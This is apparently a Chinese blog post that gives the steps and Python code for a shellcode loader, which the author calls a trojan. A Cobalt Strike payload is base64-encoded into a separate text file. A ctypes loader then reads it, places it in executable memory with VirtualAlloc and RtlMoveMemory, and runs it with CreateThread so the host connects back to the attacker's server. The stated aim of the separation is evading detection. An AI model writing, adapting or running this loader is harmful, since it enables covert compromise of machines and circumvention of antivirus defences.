无文件落地&分离拆分-将shellcode从文本中提取-file

马子分为shellcode和执行代码.

--将shellcode单独拿出,放在txt中---等待被读取执行

1-cs生成python的payload.

2-将shellcode进行base64编码

python 复制代码
import base64

code = b'         '

en_code = base64.b64encode(code)
print(en_code)

3-将编码后的shellcode放入文件内

4-读取shellcode--执行--上线

python 复制代码
import ctypes
import base64

with open('s.txt','r') as f:
    s=f.read()

shellcode=base64.b64decode(s)

ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
相关推荐
漫途科技4 小时前
物联网时代下无锡漫途科技无线多参数遥测终端助力饮水安全监测
科技·物联网·安全
链上日记6 小时前
数字资产反诈指南:识别套路,守护WEEX账户安全
人工智能·安全
lerhxx7 小时前
Web安全两大基石:深入理解与防御XSS与CSRF攻击
前端·安全
huluang7 小时前
网络安全等级测评师能力评估样卷及答案
安全·web安全
qq_266348738 小时前
系统白名单接口添加自定义验证(模仿oauth2.0),防安全扫描不通过
java·安全
独行soc8 小时前
2025年渗透测试面试题总结-105(题目+回答)
网络·python·安全·web安全·adb·渗透测试·安全狮
恒创科技HK9 小时前
高防服务器分为哪几种?香港高防服务器有什么特点?
运维·服务器·安全
安当加密14 小时前
达梦数据库TDE透明加密解决方案:构建高安全数据存储体系
网络·数据库·安全
tianhe-888817 小时前
防爆型气象站:专为高危环境设计的气象安全监测方案
安全·防爆型气象站·化工厂防爆气象站
小陈爱coding17 小时前
SaaS多租户数据隔离实战:MyBatis拦截器实现行级安全方案
安全·云原生·mybatis·多租户